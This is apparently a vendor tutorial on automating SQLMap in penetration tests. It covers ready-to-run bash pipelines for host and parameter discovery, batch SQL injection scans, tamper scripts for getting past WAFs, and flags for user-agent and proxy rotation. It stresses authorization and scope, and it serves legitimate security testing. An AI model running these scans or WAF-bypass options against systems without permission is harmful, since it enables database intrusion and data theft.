Authorized testing only — use against systems you own or have explicit written permission to test.

SQLMap Automation

SQLMap is the industry-standard tool for detecting and exploiting SQL injection vulnerabilities in authorized penetration tests. When used correctly — as a post-discovery stage in a structured offensive workflow — it transforms manual injection testing from hours of labor into a reproducible, auditable automated process. This guide covers practitioner-grade SQLMap automation: how to target parameters precisely, configure tamper scripts, control threading, manage output, and chain SQLMap with upstream tools like FFUF and Nuclei.

Offensive Workflow Chain — SQLMap as Post-Discovery Stage
01 Subfinder + httpx — Subdomain & host enumeration
live_hosts.txt
02 Nuclei — Exposure & technology fingerprinting
nuclei-findings.txt
03 FFUF + Katana — Content discovery & URL crawling
parameterized_urls.txt
04 Manual Validation — Scope review, false positive removal
validated_targets.txt
05 SQLMap — SQL injection detection & exploitation
sqlmap-output/
06 Findings Review — Report, triage, retest

Why Manual SQL Injection Testing Breaks at Scale

Modern web applications expose hundreds of endpoints across subdomains, APIs, and legacy paths. Manually testing each parameter for SQL injection is not feasible when a target scope includes dozens of hosts. The failure modes of ad-hoc testing are well understood by anyone who has run a real engagement:

The correct architecture treats SQLMap not as a weapon fired at a target, but as a post-discovery validation stage that runs precisely against parameters already confirmed to exist and accept user input. PhantomRed offensive workflow pipelines are built around this principle: every tool runs at the right stage, against validated input, with structured output.

How Automation Improves SQL Injection Testing

Automation solves the scale and consistency problems while adding a layer of operational discipline that manual testing rarely achieves. Specifically, a structured SQLMap automation workflow provides:

The shift from manual to automated SQLMap usage is not about removing human judgment — it is about reserving human judgment for the stages that require it: parameter selection, payload tuning, and result interpretation.

Example Workflow: Parameter Discovery to SQLMap Execution

The following pipeline reflects a real post-discovery SQLMap automation chain. Each stage produces output that feeds directly into the next.

Subfinder
httpx
FFUF / Katana
Parameter Discovery
Manual Validation
SQLMap

⚠ SQLMap should only run against endpoints validated to be in scope and confirmed to accept user-controlled input. Never point SQLMap at a URL list without manual review first.

Step 1 — Enumerate live hosts and URLs

Begin with subdomain enumeration and HTTP probing to build a list of live, reachable hosts within scope.

bash — host enumeration
# Enumerate subdomains and probe for live HTTP services
subfinder -d target.com -silent | httpx -silent -status-code -no-color \
  | grep "200\|301\|302\|403" \
  | awk '{print $1}' > live_hosts.txt

Step 2 — Discover URLs with parameters

Use Katana or FFUF to crawl live hosts and surface URLs that contain query parameters. Parameters are the injection surface — without this step, SQLMap has nothing precise to target. PhantomRed workflow scripts commonly chain this stage directly into the parameter validation step, passing only confirmed parameterized URLs downstream.

bash — URL and parameter discovery
# Crawl with Katana and filter for parameterized URLs
katana -list live_hosts.txt -silent -jc -kf all \
  | grep "=" \
  | sort -u > parameterized_urls.txt

# Optional: use Arjun for deeper parameter mining
arjun -i live_hosts.txt -oJ arjun_params.json --stable

Step 3 — Manual review and scoping

Before running SQLMap, review parameterized_urls.txt and remove any endpoints outside your authorized scope, admin paths you are not cleared to test, and any URLs with parameters that clearly do not accept DB-backed input (e.g., static asset paths, tracking pixels). This review step is non-negotiable.

Step 4 — Operator-grade single target run

Start with a single high-confidence endpoint before running batch mode. This confirms your flags are correct and lets you observe detection behavior before scaling up.

bash — operator-grade single target run
# Production-ready SQLMap command with full flag explanation below
sqlmap \
  -u "https://target.com/search?q=test&category=1" \
  --batch \
  --level=3 \
  --risk=2 \
  --threads=2 \
  --delay=1 \
  --timeout=30 \
  --random-agent \
  --output-dir="./sqlmap-output/target.com" \
  --forms \
  -v 1

Flag breakdown:

--level=3 — Tests depth: covers GET/POST params (1), cookies (2), and HTTP headers (3). Level 5 adds User-Agent and Referer. Start at 3 for most engagements.

--risk=2 — Payload aggressiveness: risk 1 uses safe payloads only, risk 2 adds heavy time-based tests but avoids UPDATE payloads that could modify data, risk 3 enables OR-based tests that carry data integrity risk. Use 2 as your default.

--threads=2 — Concurrent requests. Keep at 1–3 for sensitive targets. Higher values speed up detection but increase WAF trigger probability and server load.

--delay=1 — Seconds between requests. Combined with threads, this keeps your request rate predictable and within program rules.

--timeout=30 — Per-request timeout. Prevents SQLMap from hanging on slow or unresponsive endpoints.

--batch — Auto-accepts all prompts. Essential for any scripted or unattended run. Without this, SQLMap pauses for user input mid-scan.

Step 5 — Run SQLMap from a request file (recommended for complex endpoints)

For authenticated endpoints, POST requests, or APIs with custom headers, capture the raw HTTP request in Burp Suite or with curl -v and pass it to SQLMap with the -r flag. This is the most reliable method for complex targets.

bash — request file mode
# Save raw HTTP request to a file (e.g., from Burp Suite Repeater)
# request.txt content:
#   POST /api/v1/search HTTP/1.1
#   Host: target.com
#   Authorization: Bearer <token>
#   Content-Type: application/json
#
#   {"query":"test","category":1}

sqlmap \
  -r request.txt \
  --batch \
  --level=3 \
  --risk=2 \
  --threads=2 \
  --delay=1 \
  --random-agent \
  --tamper="space2comment,between" \
  --output-dir="./sqlmap-output/api-endpoint" \
  -v 1

Step 6 — Batch execution across a validated URL list

Once single-target testing is confirmed to work correctly, loop over the validated URL list. Add per-host output directories and logging.

bash — batch SQLMap pipeline
#!/usr/bin/env bash
# SQLMap batch execution — authorized targets only
# Usage: ./sqlmap-batch.sh parameterized_urls.txt

set -euo pipefail

OUT_DIR="./sqlmap-output"
URL_LIST="${1:-parameterized_urls.txt}"
LOG_FILE="${OUT_DIR}/batch-run.log"
TIMESTAMP=$(date +%Y%m%d_%H%M%S)

mkdir -p "${OUT_DIR}"

echo "[${TIMESTAMP}] Starting batch SQLMap run" | tee "${LOG_FILE}"
echo "[${TIMESTAMP}] Target list: ${URL_LIST}" | tee -a "${LOG_FILE}"

while IFS= read -r URL; do
  if [[ -z "${URL}" || "${URL}" == \#* ]]; then continue; fi

  HOST=$(echo "${URL}" | awk -F/ '{print $3}')
  HOST_DIR="${OUT_DIR}/${HOST}"
  mkdir -p "${HOST_DIR}"

  echo "[$(date +%H:%M:%S)] Testing: ${URL}" | tee -a "${LOG_FILE}"

  sqlmap \
    -u "${URL}" \
    --batch \
    --level=3 \
    --risk=2 \
    --threads=2 \
    --delay=1 \
    --random-agent \
    --output-dir="${HOST_DIR}" \
    -v 1 \
    2>&1 | tee -a "${LOG_FILE}"

  echo "[$(date +%H:%M:%S)] Done: ${URL}" | tee -a "${LOG_FILE}"

done < "${URL_LIST}"

echo "[$(date +%H:%M:%S)] Batch run complete. Output in: ${OUT_DIR}" | tee -a "${LOG_FILE}"

Tamper Scripts — Bypassing WAFs and Input Filters

When a target has a WAF or application-level input filter blocking standard SQLMap payloads, tamper scripts modify the injection syntax before it is sent. The table below covers the most operationally useful tamper scripts for real engagements.

Tamper Script What It Does When to Use
space2comment Replaces spaces with SQL comments (/**/) WAFs blocking space-delimited SQL keywords
between Replaces > with NOT BETWEEN 0 AND Filters on comparison operators
charunicodeencode Unicode-encodes non-alphanumeric characters WAFs doing basic ASCII matching
randomcase Randomizes keyword casing (SeLeCt) Case-sensitive keyword filters
equaltolike Replaces = with LIKE Equality operator filtering
base64encode Base64-encodes the full payload Applications that decode base64 input server-side
apostrophemask Replaces apostrophe with UTF-8 full-width variant Quote-filtering WAFs
bash — combining tamper scripts
# Chain multiple tamper scripts with comma separation
sqlmap \
  -u "https://target.com/page?id=1" \
  --batch \
  --tamper="space2comment,between,randomcase" \
  --random-agent \
  --level=3 \
  --risk=2 \
  --delay=1.5 \
  --output-dir="./sqlmap-output/waf-bypass"

Threading and Rate Limiting — Staying Within Scope Constraints

Aggressive SQLMap runs trigger WAF bans, overwhelm small application servers, and violate the rules of engagement on most bug bounty programs. The flags below give you precise control over request rate.

Flag Effect Recommended Value
--threads Concurrent request count 1–3 for sensitive targets, up to 5 for permissive scopes
--delay Seconds between requests 1–2 for standard runs; 3+ for restricted scopes
--timeout Per-request timeout in seconds 30 (prevents hanging on slow responses)
--retries Retry count on connection failure 2 (avoid hammering unstable targets)
--random-agent Rotates User-Agent header per request Always enabled
--proxy Routes through HTTP/SOCKS proxy Use for IP rotation or local Burp capture

When NOT to Use SQLMap

Knowing when to hold back is as important as knowing how to run the tool. SQLMap is precision tooling — it produces the most value when applied to the right targets at the right stage. Running it indiscriminately wastes time, triggers unnecessary alerts, and produces noisy false positives that undermine the findings.

No prior parameter discovery

Pointing SQLMap at a bare URL list without upstream FFUF or Katana output means testing endpoints that may not even accept DB-backed input. You will get false positives and wasted scan time.

Fragile or production targets

SQLMap’s time-based blind payloads put real load on database servers. Against fragile or high-traffic production targets without explicit approval, this risks service disruption — a scope violation in most programs.

Unauthenticated access to authenticated surfaces

If an endpoint requires a valid session to reach DB-backed logic, running SQLMap without valid credentials only tests the login page. Capture an authenticated session in Burp first and use the -r request file method.

Unvalidated scope

If the URL was found via passive recon but has not been manually confirmed to be in-scope, do not run SQLMap against it. One out-of-scope test invalidates the entire engagement in most programs.

Heavy WAF without baseline testing

Firing SQLMap cold against a WAF-protected endpoint without first understanding what payloads are blocked will immediately trigger a ban. Run a single manual payload test first to understand the filter behavior.

Risk=3 without explicit authorization

--risk=3 enables OR-based payloads that can modify database records. Never use risk 3 without explicit written authorization confirming that data modification is acceptable during the test.

SQLMap Workflow Integration — Where It Fits in the Pipeline

SQLMap is a post-validation tool. Its position in the offensive pipeline is fixed: it runs after upstream stages have identified, confirmed, and scoped the injection surface. PhantomRed workflow pipelines enforce this ordering — SQLMap receives only pre-validated, in-scope parameterized URLs from upstream stages.

Feeds Into SQLMap
FFUF Content Discovery

FFUF surfaces hidden paths and parameterized endpoints. Its output, filtered for URLs containing =, becomes the input list for SQLMap. See the FFUF automation guide for the full discovery workflow.

Feeds Into SQLMap
httpx HTTP Validation

httpx confirms which discovered hosts are live and responding. Running SQLMap against unreachable hosts wastes scan budget. httpx filtering ensures every SQLMap target is confirmed reachable.

Runs Before SQLMap
Nuclei Exposure Checks

Nuclei fingerprints technologies and detects exposed admin panels, API endpoints, and known-vulnerable paths before SQLMap runs. This informs which endpoints are high-value targets for injection testing.

Runs Before SQLMap
Nmap + Service Enumeration

Understanding the backend database technology (MySQL vs PostgreSQL vs MSSQL) before running SQLMap lets you target the correct injection techniques and skip irrelevant payload sets. See the Nmap + Nuclei + FFUF automation guide for service enumeration patterns.

Parallel Stage
Authenticated Session Testing

For applications where injection surfaces are only reachable post-login, capture an authenticated Burp request and pass it via -r. This is standard practice in PhantomRed offensive workflow scripts for API and SaaS targets.

Downstream From SQLMap
Findings Review & Reporting

SQLMap’s --output-dir creates structured session files that feed directly into report generation. The log file per host documents every tested parameter, payload used, and finding confirmed.

How PhantomRed Automates SQLMap Workflows

Manually constructing and running these pipelines for every engagement is time-consuming and error-prone. PhantomRed’s recon workflow generator produces executable shell scripts that chain the entire offensive stack — Subfinder, httpx, FFUF, Nuclei, and SQLMap — into a single reproducible pipeline, with structured output directories, timestamped logs, dependency checks, and scope warnings built in from the start.

Instead of remembering every flag combination and writing fresh scripts for each engagement, you configure the target scope once and the generator produces a complete, ready-to-execute workflow. Saved Workflow History lets you reload previous configurations, compare approaches across engagements, and iterate on what worked. PhantomRed workflow scripts enforce the correct ordering: SQLMap always runs as stage 5, after upstream stages have validated the injection surface.

For deeper background on how PhantomRed approaches autonomous penetration testing as a discipline, see the autonomous penetration testing overview.

Output Management — Structured Evidence for Reporting

SQLMap produces verbose output by default. Without structure, findings get buried in terminal scrollback and are difficult to include in reports. The recommended pattern uses a directory layout that mirrors the engagement scope:

output directory structure
sqlmap-output/
├── target.com/
│   ├── target.com/          # SQLMap session files per host
│   │   ├── log              # Human-readable finding log
│   │   ├── session.sqlite   # Session state for --resume
│   │   └── target.com.csv   # Optional CSV dump
├── api.target.com/
│   └── api.target.com/
└── batch-run.log            # Master log of all tested URLs

Use --resume to continue an interrupted scan without re-testing already-covered parameters — essential for long-running batch runs against large scopes.

bash — resume interrupted scan
# Resume a previous session
sqlmap \
  -u "https://target.com/search?q=test" \
  --batch \
  --output-dir="./sqlmap-output/target.com" \
  --resume

Benefits of Automated SQLMap Workflows

Complete Parameter Coverage

Every parameter in scope gets tested with a consistent payload set — no manual gaps.

Reproducible Engagements

The same script reruns against the same target weeks later, enabling regression testing after remediations.

Auditable Evidence Chain

Timestamped logs and structured output files document exactly what was tested, when, and with which payloads.

Controlled Engagement Noise

Threading and delay flags keep request rates within program rules and avoid triggering lockouts.

Pipeline Integration

SQLMap plugs into the same shell pipeline as Subfinder, FFUF, and Nuclei — no manual handoffs between tools.

Workflow Continuity

Session files and output directories survive interruptions — resume exactly where the scan stopped.

Frequently Asked Questions

What is SQLMap used for in penetration testing?
SQLMap automates detection and exploitation of SQL injection vulnerabilities in authorized penetration tests. It is used after parameter discovery to confirm injectable endpoints and extract database contents under a controlled, written-permission-based engagement.
How do you automate SQLMap in a recon pipeline?
Chain SQLMap after parameter discovery tools like FFUF or Arjun. Discovered endpoints and parameter names feed into SQLMap via -u, -r (raw request file), or --forms flags. Batch execution loops over a validated URL list and saves output to structured directories using --output-dir.
What are SQLMap tamper scripts and when should you use them?
Tamper scripts modify payloads before injection to bypass WAFs and input filters. Common scripts include space2comment (replaces spaces with SQL comments), between (rewrites comparison operators), and charunicodeencode (Unicode-encodes characters). Use them when standard payloads are blocked by WAF signatures.
How do you prevent SQLMap from triggering rate limits or bans?
Use --delay to add seconds between requests, --threads to cap concurrency (1–3 for sensitive targets), --random-agent to rotate User-Agent headers, and --proxy for IP rotation. Always align request rate with the target’s rules of engagement before running.
Is SQLMap legal to use?
SQLMap is legal only against systems you own or have explicit written authorization to test. Unauthorized use against third-party systems is illegal under computer fraud laws in most jurisdictions. Always obtain a scope agreement or confirm bug bounty program rules before running SQLMap against any target.
When should you NOT use SQLMap?
Avoid SQLMap against fragile or production targets without explicit approval, endpoints with no confirmed user-controlled input, targets protected by strict WAFs without first validating manually, and any system outside your authorized scope. SQLMap is a post-discovery tool — running it without upstream parameter validation wastes time and risks false positives.
How does PhantomRed integrate SQLMap into automated workflows?
PhantomRed’s recon workflow generator produces executable shell scripts that chain Subfinder, httpx, FFUF, Nuclei, and SQLMap into a single orchestrated pipeline. Each stage feeds validated endpoints to the next, with structured output directories, timestamped logs, and dependency checks built in automatically.

Generate Your SQLMap Workflow

Build a complete, executable shell script that chains subdomain enumeration, HTTP probing, parameter discovery, and SQLMap into one reproducible pipeline.

Open Workflow Generator →
No account required. Export as .sh and run immediately.

⬡ Continue the Workflow